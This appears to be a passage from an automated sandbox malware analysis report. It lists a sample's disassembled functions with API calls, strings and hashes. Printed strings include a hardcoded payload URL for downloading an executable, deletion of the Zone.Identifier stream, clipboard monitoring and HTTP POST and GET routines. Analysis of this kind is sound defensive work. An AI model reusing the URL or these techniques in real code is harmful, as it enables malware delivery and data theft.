                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe$.Wu
                                                                                                                                                                                                      • API String ID: 2816847299-3679779081
                                                                                                                                                                                                      • Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                                      • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28
                                                                                                                                                                                                      Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 548 40b850-40b867 call 40b780 551 40b869 548->551 552 40b86e-40b88a call 40b3d0 strcmp 548->552 553 40baf5-40baf8 551->553 556 40b891-40b8ad call 40b3d0 strstr 552->556 557 40b88c 552->557 560 40b8f0-40b90c call 40b3d0 strstr 556->560 561 40b8af-40b8cb call 40b3d0 strstr 556->561 557->553 568 40b90e-40b92a call 40b3d0 strstr 560->568 569 40b94f-40b96b call 40b3d0 strstr 560->569 566 40b8eb 561->566 567 40b8cd-40b8e9 call 40b3d0 strstr 561->567 566->553 567->560 567->566 578 40b94a 568->578 579 40b92c-40b948 call 40b3d0 strstr 568->579 576 40b96d-40b989 call 40b3d0 strstr 569->576 577 40b9ae-40b9c4 EnterCriticalSection 569->577 590 40b9a9 576->590 591 40b98b-40b9a7 call 40b3d0 strstr 576->591 582 40b9cf-40b9d8 577->582 578->553 579->569 579->578 583 40ba09-40ba14 call 40bb00 582->583 584 40b9da-40b9ea 582->584 597 40baea-40baef LeaveCriticalSection 583->597 598 40ba1a-40ba28 583->598 587 40ba07 584->587 588 40b9ec-40ba05 call 40df20 584->588 587->582 588->583 590->553 591->577 591->590 597->553 600 40ba2a 598->600 601 40ba2e-40ba3f call 40a740 598->601 600->601 601->597 604 40ba45-40ba62 call 40df20 601->604 607 40ba64-40ba74 604->607 608 40baba-40bad2 604->608 609 40ba80-40bab8 call 40ab60 607->609 610 40ba76-40ba7e Sleep 607->610 611 40bad8-40bae3 call 40bb00 608->611 609->611 610->607 611->597 616 40bae5 call 40b530 611->616 616->597
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                                        • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                                      • strcmp.NTDLL ref: 0040B880
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                                      • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                                      • API String ID: 2906596889-2213908610
                                                                                                                                                                                                      • Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                                      • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE
                                                                                                                                                                                                      Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 618 401920-401947 GetTickCount WaitForSingleObject 619 401ac9-401acf 618->619 620 40194d-401964 WSAWaitForMultipleEvents 618->620 621 4019f0-401a03 GetTickCount 620->621 622 40196a-401981 WSAEnumNetworkEvents 620->622 623 401a43-401a4c GetTickCount 621->623 624 401a05-401a14 EnterCriticalSection 621->624 622->621 625 401983-401988 622->625 629 401ab5-401ac3 WaitForSingleObject 623->629 630 401a4e-401a5d EnterCriticalSection 623->630 626 401a16-401a1d 624->626 627 401a3a-401a41 LeaveCriticalSection 624->627 625->621 628 40198a-401990 625->628 631 401a35 call 401820 626->631 632 401a1f-401a27 626->632 627->629 628->621 633 401992-4019b1 accept 628->633 629->619 629->620 634 401aa1-401ab1 LeaveCriticalSection GetTickCount 630->634 635 401a5f-401a77 InterlockedExchangeAdd call 40df20 630->635 631->627 632->626 636 401a29-401a30 LeaveCriticalSection 632->636 633->621 638 4019b3-4019c2 call 4022c0 633->638 634->629 643 401a97-401a9f 635->643 644 401a79-401a82 635->644 636->629 638->621 645 4019c4-4019df call 401740 638->645 643->634 643->635 644->643 646 401a84-401a8d call 40b4f0 644->646 645->621 651 4019e1-4019e7 645->651 646->643 651->621 652 4019e9-4019eb call 401cf0 651->652 652->621
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                                      • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                                      • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                      • String ID: PCOI$ilci
                                                                                                                                                                                                      • API String ID: 3345448188-3762367603
                                                                                                                                                                                                      • Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                                      • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99
                                                                                                                                                                                                      Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040EF98
                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                                                                                      • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                                                                                      • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                      • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                      • API String ID: 2761394606-2217117414
                                                                                                                                                                                                      • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                                      • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54
                                                                                                                                                                                                      Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96networkCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                      • String ID: PCOI$ilci$.Wu
                                                                                                                                                                                                      • API String ID: 2403999931-3309795540
                                                                                                                                                                                                      • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                                      • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98
                                                                                                                                                                                                      Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 697 4059b0-4059d2 GetWindowLongW 698 4059d4-4059db 697->698 699 4059f6-4059fd 697->699 700 4059e1-4059e5 698->700 701 405a67-405a78 IsClipboardFormatAvailable 698->701 702 405a26-405a2c 699->702 703 4059ff 699->703 709 405a04-405a21 SetClipboardViewer SetWindowLongW 700->709 710 4059e7-4059eb 700->710 707 405a83-405a8d IsClipboardFormatAvailable 701->707 708 405a7a-405a81 701->708 705 405a46-405a4a 702->705 706 405a2e-405a44 SetWindowLongW 702->706 704 405be4-405bfd DefWindowProcA 703->704 711 405a62 705->711 712 405a4c-405a5c SendMessageA 705->712 706->711 714 405a98-405aa2 IsClipboardFormatAvailable 707->714 715 405a8f-405a96 707->715 713 405aab-405aaf 708->713 709->704 716 4059f1 710->716 717 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 710->717 711->704 712->711 719 405ab5-405abf OpenClipboard 713->719 720 405b7f-405b83 713->720 714->713 718 405aa4 714->718 715->713 716->704 717->704 718->713 719->720 723 405ac5-405ad6 GetClipboardData 719->723 721 405b85-405b95 SendMessageA 720->721 722 405b9b 720->722 721->722 722->704 724 405ad8 723->724 725 405add-405aee GlobalLock 723->725 724->704 726 405af0 725->726 727 405af5-405b06 725->727 726->704 728 405b08-405b0c 727->728 729 405b29-405b3c call 40d250 727->729 730 405b3e-405b4e call 4057f0 728->730 731 405b0e-405b12 728->731 737 405b51-405b65 GlobalUnlock CloseClipboard 729->737 730->737 733 405b14 731->733 734 405b16-405b27 call 405680 731->734 733->737 734->737 737->720 740 405b67-405b7c call 404970 call 40ab60 737->740 740->720
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                                                                                      • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                                                                                      • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                                                                                      • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                                                                                      • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3549449529-0
                                                                                                                                                                                                      • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                                      • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69
                                                                                                                                                                                                      Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 004058D8
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00405926
                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                      • String ID: %x%X$0
                                                                                                                                                                                                      • API String ID: 716646876-225668902
                                                                                                                                                                                                      • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                                      • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
                                                                                                                                                                                                      Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 767 40e640-40e6db memset InternetCrackUrlA InternetOpenA 768 40e6e1-40e714 InternetConnectA 767->768 769 40e857-40e860 767->769 770 40e84a-40e851 InternetCloseHandle 768->770 771 40e71a-40e74a HttpOpenRequestA 768->771 770->769 772 40e750-40e767 HttpSendRequestA 771->772 773 40e83d-40e844 InternetCloseHandle 771->773 774 40e830-40e837 InternetCloseHandle 772->774 775 40e76d-40e771 772->775 773->770 774->773 776 40e826 775->776 777 40e777 775->777 776->774 778 40e781-40e788 777->778 779 40e819-40e824 778->779 780 40e78e-40e7b0 InternetReadFile 778->780 779->774 781 40e7b2-40e7b9 780->781 782 40e7bb 780->782 781->782 783 40e7bd-40e814 call 40a990 memcpy 781->783 782->779 783->778
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040E668
                                                                                                                                                                                                      • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                      • String ID: <$GET
                                                                                                                                                                                                      • API String ID: 1205665004-427699995
                                                                                                                                                                                                      • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                                      • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                                                                                      Function 00406F70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                                                                                        • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                                                                                        • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                                                                                      • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00407072
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00407092
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004070B5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
